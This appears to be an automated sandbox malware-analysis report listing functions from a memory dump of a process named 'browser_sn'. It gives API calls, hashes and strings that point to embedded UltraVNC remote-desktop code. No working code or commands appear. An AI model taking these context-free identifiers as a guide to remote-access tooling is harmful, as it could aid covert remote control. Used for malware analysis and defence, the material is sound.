                                                                            Function 00007FF6C2C3AB9C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF6C2C3ABE5,?,?,00000028,00007FF6C2C38C7D,?,?,00000000,00007FF6C2C4329C,?,?,?,00007FF6C2C47749), ref: 00007FF6C2C3ABAB
                                                                            • GetProcAddress.KERNEL32(?,?,000000FF,00007FF6C2C3ABE5,?,?,00000028,00007FF6C2C38C7D,?,?,00000000,00007FF6C2C4329C,?,?,?,00007FF6C2C47749), ref: 00007FF6C2C3ABC0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 1646373207-1276376045
                                                                            • Opcode ID: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
                                                                            • Instruction ID: e854848e9e8ad9a1a6e6419b27985f213e764ad8f89f9876967685cfdbc07ce4
                                                                            • Opcode Fuzzy Hash: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
                                                                            • Instruction Fuzzy Hash: 0EE0CD10F0670241FE889F6164400B433B16F4470AF480478CE8D82390EEBCE494D340
                                                                            Function 00007FF6C2BA22C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 236COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.LIBCMT ref: 00007FF6C2BA2328
                                                                              • Part of subcall function 00007FF6C2C38C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6C2C38C64
                                                                              • Part of subcall function 00007FF6C2C38C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6C2C4329C,?,?,?,00007FF6C2C47749,?,?,?,00007FF6C2C477F3), ref: 00007FF6C2C38C89
                                                                              • Part of subcall function 00007FF6C2C38C34: _callnewh.LIBCMT ref: 00007FF6C2C38CA2
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CAD
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CB8
                                                                            • free.LIBCMT ref: 00007FF6C2BA2564
                                                                            • free.LIBCMT ref: 00007FF6C2BA2617
                                                                              • Part of subcall function 00007FF6C2C38BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C38C0A
                                                                              • Part of subcall function 00007FF6C2C38BF4: _errno.LIBCMT ref: 00007FF6C2C38C14
                                                                              • Part of subcall function 00007FF6C2C38BF4: GetLastError.KERNEL32(?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C38C1C
                                                                            Strings
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF6C2BA230B
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                            • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called
                                                                            • API String ID: 1063416079-2438250478
                                                                            • Opcode ID: b91b3815987c1d864741d9dafe87806842c0b4a4c5ecf3becbba3b7bbfacea16
                                                                            • Instruction ID: 518aa9b13421d55209cf23da2ef59b264fc3071d11e7e780f5cc00b8c4dd3f9f
                                                                            • Opcode Fuzzy Hash: b91b3815987c1d864741d9dafe87806842c0b4a4c5ecf3becbba3b7bbfacea16
                                                                            • Instruction Fuzzy Hash: 51A14726B04A9184EB50DF66C8542AD3761FB89FADF148232DE6E97BE5DFB8C445C300
                                                                            Function 00007FF6C2B90B70 Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DataRegion$DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 3467850875-0
                                                                            • Opcode ID: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
                                                                            • Instruction ID: 72d6369417daa6b81f62dfc6d8f70cfaaa84eedbb21f21bf358042e4df66f222
                                                                            • Opcode Fuzzy Hash: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
                                                                            • Instruction Fuzzy Hash: 5351BAB2A05A918BD790CF19D480AADB7F0FB48B98B459532EE8DC3350DF79D895CB00
                                                                            Function 00007FF6C2C399CC Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2819658684-0
                                                                            • Opcode ID: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                                            • Instruction ID: ccc9a0e0d56d311252c0940fa2774041c1b55694d06c8761c46635e7126b15e2
                                                                            • Opcode Fuzzy Hash: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
                                                                            • Instruction Fuzzy Hash: 1F214C61A1D78345EBA19E2169012BE62B4BF49BD9F444931EFCDC7B86DEACE400CB00
                                                                            Function 00007FF6C2BB5940 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterExceptionInitializeLeaveRaisemalloc
                                                                            • String ID: G
                                                                            • API String ID: 2834860089-985283518
                                                                            • Opcode ID: 1d474c01279c2a9434e3c4812ff55c46e0b017860c5d5c7f73ec849190a36a26
                                                                            • Instruction ID: 6ba5c79404dea0dedb0f2e0fd26ad1fe774ae6f88a95dbd157a028513ceeade6
                                                                            • Opcode Fuzzy Hash: 1d474c01279c2a9434e3c4812ff55c46e0b017860c5d5c7f73ec849190a36a26
                                                                            • Instruction Fuzzy Hash: 4E318F32918B8186E7508F24E5842A873A4FB45BADF440235DFDA87BD4CFBCD495C701
                                                                            Function 00007FF6C2B8A290 Relevance: 6.1, APIs: 4, Instructions: 57comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize
                                                                            • String ID:
                                                                            • API String ID: 948891078-0
                                                                            • Opcode ID: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                                            • Instruction ID: 7c1d47fea2ce9c6b90eb529a20df9986796427a214de0ea2f417f27ba69a598d
                                                                            • Opcode Fuzzy Hash: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
                                                                            • Instruction Fuzzy Hash: 5C213D32A18B4282E7508F29E45426A73B0FB89B5AF505132EBDEC37A4DFBDD444CB00
                                                                            Function 00007FF6C2C03CA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.LIBCMT ref: 00007FF6C2C03CCE
                                                                              • Part of subcall function 00007FF6C2C38C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6C2C38C64
                                                                              • Part of subcall function 00007FF6C2C38C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6C2C4329C,?,?,?,00007FF6C2C47749,?,?,?,00007FF6C2C477F3), ref: 00007FF6C2C38C89
                                                                              • Part of subcall function 00007FF6C2C38C34: _callnewh.LIBCMT ref: 00007FF6C2C38CA2
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CAD
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CB8
                                                                            • free.LIBCMT ref: 00007FF6C2C03CFA
                                                                              • Part of subcall function 00007FF6C2C38BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C38C0A
                                                                              • Part of subcall function 00007FF6C2C38BF4: _errno.LIBCMT ref: 00007FF6C2C38C14
                                                                              • Part of subcall function 00007FF6C2C38BF4: GetLastError.KERNEL32(?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C38C1C
                                                                            • free.LIBCMT ref: 00007FF6C2C03D0E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                            • String ID: Unable to allocate memory in zip library at %s
                                                                            • API String ID: 1063416079-1743894623
                                                                            • Opcode ID: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
                                                                            • Instruction ID: 101784c80b9a18a61d76685ea07652313e994a3b9b2cbea9c6c32d81f4121b6c
                                                                            • Opcode Fuzzy Hash: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
                                                                            • Instruction Fuzzy Hash: 9211B12162DBC289EA90DF15A5801BA7770FB44B9EF080631EFED87796CE6CE5418B04
                                                                            Function 00007FF6C2C179A0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CreateEnterErrorExceptionLastLeaveRaiseSemaphore
                                                                            • String ID:
                                                                            • API String ID: 1747828912-0
                                                                            • Opcode ID: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                                            • Instruction ID: 9a79da28d91017e9ff5aff0cd29ed09319e1f628715da0d57851f390d773dbd9
                                                                            • Opcode Fuzzy Hash: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
                                                                            • Instruction Fuzzy Hash: 7C112E72A24751A7E744CF25E58015977B4FB48B95F10513AEB9983B50CFBCE0B5CB40
                                                                            Function 00007FF6C2BA92C0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32 ref: 00007FF6C2BA92F0
                                                                              • Part of subcall function 00007FF6C2C17520: EnterCriticalSection.KERNEL32 ref: 00007FF6C2C17534
                                                                              • Part of subcall function 00007FF6C2C17520: ReleaseSemaphore.KERNEL32 ref: 00007FF6C2C17577
                                                                              • Part of subcall function 00007FF6C2C17520: GetLastError.KERNEL32 ref: 00007FF6C2C17581
                                                                              • Part of subcall function 00007FF6C2C17520: LeaveCriticalSection.KERNEL32 ref: 00007FF6C2C1758C
                                                                              • Part of subcall function 00007FF6C2C17400: EnterCriticalSection.KERNEL32 ref: 00007FF6C2C17427
                                                                              • Part of subcall function 00007FF6C2C17400: LeaveCriticalSection.KERNEL32 ref: 00007FF6C2C17472
                                                                              • Part of subcall function 00007FF6C2C17400: LeaveCriticalSection.KERNEL32 ref: 00007FF6C2C1747B
                                                                              • Part of subcall function 00007FF6C2C17400: WaitForSingleObject.KERNEL32 ref: 00007FF6C2C1748A
                                                                              • Part of subcall function 00007FF6C2C17400: EnterCriticalSection.KERNEL32 ref: 00007FF6C2C17495
                                                                              • Part of subcall function 00007FF6C2C17400: GetLastError.KERNEL32 ref: 00007FF6C2C174A7
                                                                              • Part of subcall function 00007FF6C2C17400: EnterCriticalSection.KERNEL32 ref: 00007FF6C2C174DE
                                                                              • Part of subcall function 00007FF6C2C17400: LeaveCriticalSection.KERNEL32 ref: 00007FF6C2C17500
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Enter$Leave$ErrorLast$ObjectReleaseSemaphoreSingleWait
                                                                            • String ID: b$vncclient.cpp : disable update thread$vncclient.cpp : enable/disable synced
                                                                            • API String ID: 1962697109-2518527632
                                                                            • Opcode ID: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                                            • Instruction ID: 0904bc800261134cc6dd17a525c78124cd6d9a3732fbdf99749c0c39e9cf17bc
                                                                            • Opcode Fuzzy Hash: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                                            • Instruction Fuzzy Hash: 34113A31A09A8282EB40DF25D8506A973B1FB85BADF484235DE9E873E9DFBCD405C700
                                                                            Function 00007FF6C2C44FA8 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _amsg_exit$_getptd_lockfree
                                                                            • String ID:
                                                                            • API String ID: 2148533958-0
                                                                            • Opcode ID: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                                            • Instruction ID: 41eb0729d0010a6f47f7b8039947623b238622321281475f98fec1c645f75cd5
                                                                            • Opcode Fuzzy Hash: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                                            • Instruction Fuzzy Hash: FD114F2AA19A4182EBD49F20E4407BA3370FF5478AF485136DF8E83795DFACE455C741
                                                                            Function 00007FF6C2B97960 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
